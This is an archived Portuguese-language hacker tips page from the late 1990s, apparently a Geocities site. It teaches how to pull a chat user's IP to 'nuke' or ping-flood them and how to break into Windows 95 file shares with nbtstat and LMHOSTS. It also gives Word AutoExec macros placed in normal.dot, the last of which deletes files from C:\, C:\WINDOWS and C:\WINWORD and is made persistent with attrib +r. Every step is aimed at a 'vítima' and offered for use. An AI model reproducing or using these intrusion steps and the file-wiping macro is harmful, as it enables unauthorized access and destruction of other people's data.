Page archived courtesy of the Geocities Archive Project https://www.geocitiesarchive.org
Please help us spread the word by liking or sharing the Facebook link below :-)



Dicas Rápidas

Pegando IP em chat:                  

  • Feche todos os seus aplicativos de rede, ICQ, FTP, XITAMI..., que você estiver usando. Feche todos os navegadores que não sejam da sala aonde o cara se encontra é lógico! Concentre-se só na sala do chat na qual se encontra o cara que você quer pegar o ip. Peça as pessoas que estão conversando com você para pararem de te mandarem mensagens, quando isto acontecer mande algumas mensagens em seqüência para vitima. Alterne para o seu MS-DOS (ALT +TAB) , na hora e digite: arp -a Ficando assim: C:\WINDOWS> arp -a Neste momento serão retomados, vários IP'S, ( 4 à 6 em média). O primeiro é o IP da sala aonde você se encontra. Entretanto, na "MAIORIA DAS VEZES" o segundo IP é do gafanhoto que você quer mandar para os sapos ! Se você não tem certeza e deseja confirmar isto, guarde o IP e compare com as informações que você tem sobre a vítima (provedora por exemplo). Se você não sabe nada dela, paciência, pegue todos os IP's e nuke um à um, ou faça um ping flood que será explicado abaixo, ou repita o procedimento acima várias vezes e guarde os IP'S que estão repetindo com mais freqüência. E tome as medidas que desejar.

Invasão por IP

  • Aqui você tem um tutorial de como fazer uma invasão por IP. Você tem que ter os clientes para a rede microsoft instalado, seus arquivos e impressora compartilhados. Não sabe como fazer isso? Olhe os passos abaixo. Vá no painel de controle depois em redes. Caso seu computador não tenha os clientes instalados nem os arquivos e impressoras compartilhados, instale e compartilhe. Para instalar clique em adicionar e escolha cliente para rede microsoft e logo em seguida compartilhe os arquivos e a impressora. O windows 95 assim como o 98 vem com alguns programas internos que a grande maioria dos usuários desconhecem, dentre eles estão netstat, nbtstat, ftp e etc, para podermos descobrir alguns dados da vítima a ser invadida, nos precisamos do programinha chamado de nbtstat que vem no windows, ele se encontra geralmente no C:\windows. A vítima a ser invadida tem que ter os clientes para a rede microsoft também instalados assim como estarem com os arquivos compartilhados podendo ser um dos drives ou seu disco rígido... isso não chega a ser um grande problema, pois é muito fácil de convencer alguém a compartilhar seus discos rígidos, sem contar os que já compartilharam e nem sabem e os administradores de rede que deixam seus HDs compartilhados para manutenção. As vezes encontramos alguns desses administradores que compartilham seus discos rígidos sem senhas... Se você for programador, você pode fazer um programinha que altere as configurações do computador da pessoa para que automaticamente seus Drives ou discos rígidos(HDs) fiquem compartilhados por completo e sem senha. Pode acontecer que você encontre algum computador com os drives compartilhados e com senha. Ai você vai ter que se virar e descobrir a senha ou criar um programa que burle isso...

    Você precisa saber:

    · Ip da vítima.
    · O nome do computador da vítima
    .

  • Existem várias maneiras de se descobrir o ip de uma pessoa, para isso entre na seção Brincando com o IP da minha página, lá estão alguns métodos. O nome do computador da vítima você só descobre depois que já souber do Ip. É nessa hora que o nbtstat entra em ação.... Para descobrir o nome do computador da vítima vá em iniciar, depois executar e digite nbtstar -A (ip da vítima) tomei como exemplo o ip 200.239.43.68. segue exemplo abaixo: Repare nesse exemplo , ele tem dois nomes seguidos de <3> isso quer dizer que um daqueles nomes seguido de <3> é o nome do computador da vítima. Ai você que quer invadir, vai ter que testar os dois até ver qual funciona!!! Pronto agora que você já sabe o Ip e o nome do computador da vítima, você tem que coloca-los no lmhosts e salvar esse arquivo dentro da pasta do windows, mas presta atenção, esse arquivo lmhosts não deve ter nenhuma extensão, é só lmhosts mesmo. Ele não existe na instalação do windows, ou seja você tem que criar um arquivo chamado lmhosts. Seguem os exemplos abaixo: Obs: o lmhosts não se chama lmhosts.sam, apenas lmhosts, ele não tem nenhuma extensão. Você cria o lmhosts da seguinte forma, coloque o IP 127.0.0.1 (sempre coloque esse ip 127.0.0.1)e o nome do seu computador em primeiro lugar, e em seguida os IPs das vítimas e seus respectivos nomes. No exemplo acima eu coloquei a vítima um computador chamado pr digy, repare como o nome vem seguido logo depois do IP. Agora que você já criou o arquivo lmhosts você já pode localizar o computador da vítima na rede, é como se você estivesse em uma intranet e aquele computador "vítima" também estivesse nessa mesma internet. Vá em iniciar, localizar , computador. Lá você pode colocar o Ip da vítima, ou colocar o nome do computador da vítima, tente os dois, o que funcionar você utiliza. segue o exemplo do IP abaixo.

    2ª PARTE:

  • Alegria de uns, tristeza de outros, na verdade, aqueles que utilizam a rede Dial-Up do Win95 para sua conecção com a internet podem estar correndo sérios riscos a não ser, é claro, que assim conectam-se propositalmente, com intenções "diversas". Utilizar-se de uma conecção PPP do Win95 num provedor de acesso, significa estar disponibilizando seu computador a todos os usuário da net. Mesmo sem o compartilhamento de arquivos, existem diversas ferramentas que permitem a outra pessoa conectar-se ao seu computador caso você esteja utilizando esse tipo de conecção. conecte-se à Internet utilizando a rede Dial-Up do Win95. Se o seu provedor não disponibilizar uma conecção do tipo PPP, estas dicas não funcionarão. Verifique antes, se você possui os drivers clientes para redes Microsoft. Caso não estejam instalados, instale-os através do Painel de Controle, no ícone Redes. Verifique também se o compartilhamento de Arquivos e Impressoras está instalado. Se estiver, você estará sujeito à que outra pessoa conecte-se ao seu computador simplesmente sabendo seu IP. Se bem que, para aqueles que já sabem, existem mil maneiras diferentes de se "burlar" a fraquinha segurança do Win95. Para você poder encontrar outros computadores compartilhados, você deve configurar WINS e LMHOSTS. O WINS é utilizado para localizar os computadores com IP fixo. O LMHOSTS, é acionado automaticamente na procura de computadores que possuem IP dinâmicos. Configurar essas opções é simples. Vá ao Painel de Controle e abra Rede. Verifique as propriedades do protocolo TCP/IP. Alí você encontrará a opção para ativar a resolução WINS. No caso de você não conhecer nenhum servidor WINS, utilize 204.118.34.6 como primário e 204.118.34.11 como secundário. Esses servidores são dos USA, e gratuítos. Caso queira outros endereços, utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS, você precisa criar um arquivo texto simples, utilizando-se até mesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS. É nesse arquivo que ficarão os endereços de IP e os nomes dos computadores que você terá acesso. Para localizar um determinado computador, você digita o seu número de IP e a seguir seu NetBios, na mesma linha, separados por um espaço. Se você executar o programa NBSTSTAT, seguido da opção -N, você obterá essa lista, com o nome e o IP de seu computador sempre sendo o primeiro da lista, seguido das outras máquinas disponíveis, tudo numa janela DOS. Através do Explorer você poderá ver os computadores disponíveis na rede, dos quais você ainda poderá utilizar.

Trojans

  • Você conhece aquela história sobre o presente de grego (literalmente), um belo cavalo de madeira, que escondia centenas de soldados prontos para acabar com a paz dos troianos, certo?
    Na era da informática não mudou muito, a não ser pelo fato de que os cavalos de madeira são feitos agora de bytes. Os chamados "programas Cavalo-de-Tróia" são, aparentemente, programas comuns, muitas vezes conhecidos, algumas vezes novos, mas que sempre fazem algo mais do que anunciam.
    Seja capturar senhas, causar estragos ou tirar proveito do usuário de alguma forma não documentada. Ta complicado? Imagina o seguinte: toda vez que você se conecta ao seu provedor, ele executa um programa chamado "login", que lhe pergunta seu nome e sua senha. Imagina se alguém faz um programa muito parecido com o "login" mas que, ao invés de lhe conectar no provedor, ele faz uma cópia da sua senha em um arquivo escondido, onde apenas o autor do programa alterado sabe o local. Em alguns dias ele resgata este arquivo e terá nas mãos a senha de quase todos os usuários do seu provedor.
    Algumas pessoas têm confundido Cavalos de Tróia com Backdoors. Os conceitos são parecidos, mas existem diferenças fundamentais. Por exemplo: o Back Orifice e o NetBus são Cavalos de Tróia, pois não possuem nenhuma finalidade prática para a vítima. Já o ICKiller, que derruba usuários do ICQ possui uma backdoor, pois há uma porta dos
    fundos que permite certas invasões.

                                                                    

Vírus de Macro

  • Word possui um arquivo chamado "normal.dot" onde estão todas as configuracões padrão do word. Se por algum motivo este arquivo for deletado o Word cria automaticamente quando for inicializado.

Niveis de sacanagem
Nivel 1..... Apenas uma brincadeira
Nivel 2..... Apenas uma brincadeira de mau gosto
Nivel 3..... não é mais brincadeira.

  • Primeiro você precisa criar uma macro... siga os passos:
    Entre no Word, feche a janela de documento, não deixe nenhum documento aberto(ativo), clique em Arquivo(File) depois Macro, coloque no nome da macro "AutoExec"(obrigatorio) esta macro é inicializada toda vez que o Word for iniciado, depois clique em 'Criar', delete as duas linhas que tiver la (Sub MAIN e End Sub) e cole a rotina que tem logo mais abaixo.

ps: existe outras formas/meios d criar uma macro,mas esta é mais simples.

 

Nivel 1

  • O nivel 1 serve para voce se mostrar, falando que entende do Word melhor do que ninguem.
    Cada vez que o usuario inicia o Word receberá uma mensagem... de alerta ou qualquer outro coisa que sair da sua mente. veja abaixo.

Sub MAIN
MsgBox "Voce ‚ um pentelho! Eu nÆo irei prosseguir com o sistema", "Microsoft Word", 5
MsgBox "Usuário «Fïgµ®ä» Detectado", "FATAL ERROR", 16
MsgBox "Figuras ", "Os melhores", 64
End Sub

 

Nivel 2

  • É para deixar o usuario irritadíssimo.
    no corpo da macro cole este texto abaixo:

Sub MAIN
ArquivoNovoPadrão
Inserir "Figuras"
ArquivoNovoPadrão
Inserir "Net"
ArquivoNovoPadrão
Inserir "Killer"
ArquivoNovoPadrão
Inserir "Figuras Net Killer "
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "Figuras Net Killer "
End Sub

 

Nivel 3

  • Bom este nivel é pura sacanagem,com ele um simples clicar* do mouse, e tudo desaparece! isto mesmo "del *.*" ou apenas os documentos, voce é quem sabe.

Sub MAIN
Kill "C:\*.*"
Kill "C:\WINDOWS\*.*"
Kill "C:\WINWORD\*.*"
End Sub

Lembre-se de que estes macros, sao gravado no arquivo default do word, ou seja no 'normal.dot' se este arquivo for deletado, o Word cria automaticamente na inicializacao,entao se voce for fazer estas sacanagens ai acima, proteja este arquivo, com o comando 'attrib +r'.

OBS: Espero que essas dicas lhe sejam úteis, só lembrando não somos responsabilizados por conhecimentos adquiridos aqui. Todos seus atos serão cobrados de você.

.::Angels Life Br Corporation::.


 

1